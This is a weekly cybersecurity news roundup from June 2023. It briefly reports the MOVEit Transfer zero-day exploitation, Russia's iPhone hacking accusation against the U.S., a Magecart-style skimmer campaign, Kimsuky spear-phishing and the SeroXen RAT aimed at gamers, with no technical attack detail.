News

MOVEit zero-day exploit and the U.S. iPhone hack accusation

Dan Virgillito
June 5, 2023 by
Dan Virgillito

MOVEit discloses zero-day exploit causing mass data theft, Russia accuses U.S. intelligence of hacking thousands of iPhones and the Magecart-cart style web skimmer. Catch all this and more in this week’s edition of Cybersecurity Weekly.

Should you pay the ransom?

Should you pay the ransom?

Download The Ransomware Paper for real-world ransomware examples, mistakes and lessons learned.

1. Hackers mass exploited MOVEit Transfer zero-day to steal data

Hackers are actively exploiting a critical zero-day vulnerability, tracked as CVE-2023-34362, in the MOVEit Transfer file transfer software developed by Ipswitch. The flaw allows remote code execution and data theft, affecting thousands of exposed servers, primarily in the U.S. Although the motive of the threat actors is unclear, organizations should prepare for possible extortion and publication of stolen data. The MOVEit Cloud platform was also impacted by the vulnerability, with users being urged to investigate for potential data theft.

Read more »

2. Russia says U.S. hacked thousands of iPhones to spy on diplomats

Russia has accused the U.S. of hacking thousands of iPhones belonging to Russian and foreign diplomats. The Federal Security Service (FSB) alleged that Apple worked closely with U.S. spy agencies but provided no evidence. Separately, Kaspersky Lab reported a targeted cyberattack on its senior employees using an invisible iMessage with a malicious attachment. A company spokesman stated that Russian authorities believe the attacks are linked but didn’t directly attribute them to the United States.

Read more »

3. New Magecart-style campaign targeting legitimate e-commerce sites

Cybersecurity researchers have discovered an ongoing Magecart-style web skimmer campaign that poses a significant threat to e-commerce websites. The campaign involves hijacking vulnerable sites and using them as command-and-control servers. Notably, the attackers employ evasion techniques, disguising the skimmer code as popular third-party services such as Google Analytics. The compromised websites unwittingly distribute the malware to other vulnerable sites, amplifying the attack's impact. This sophisticated campaign targets websites globally, jeopardizing the personal data and credit card information of thousands of visitors.

Read more »

4. North Korean hackers impersonating journalists to collect intel

The North Korean hacker group Kimsuky, also known as APT43, has been conducting spear-phishing campaigns to gather intelligence. Kimsuky impersonates journalists and academics, using convincing tactics to deceive targets. Multiple government agencies in the U.S. and South Korea have issued a joint advisory highlighting the group's activities. The advisory emphasizes the need for strong passwords and multi-factor authentication as essential measures to mitigate this threat. It also cautions against enabling macros or opening attachments from unknown sources.

Read more »

5. Hackers using stealthy SeroXen RAT to target gamers

Cybercriminals are increasingly targeting gamers using a fileless RAT (remote access trojan) called SeroXen, which is distributed through social media and hacker forums. This malware combines various open-source projects, making it highly effective at evading detection. SeroXen is delivered through Discord channels or phishing emails using a hidden batch file that installs the final payload as rootkit arrays. The malware is primarily aimed at the gaming community, available for as little as $15-$30 per month. Its low cost and undetectable nature pose significant threats, prompting cybersecurity researchers to raise awareness and highlight its capabilities.

Read more »

See Infosec IQ in action

See Infosec IQ in action

From gamified security awareness to award-winning training, phishing simulations, culture assessments and more, we want to show you what makes Infosec IQ an industry leader.

Dan Virgillito
Dan Virgillito

Dan Virgillito is a blogger and content strategist with experience in cyber security, social media and tech news. Visit his website or say hi on Twitter.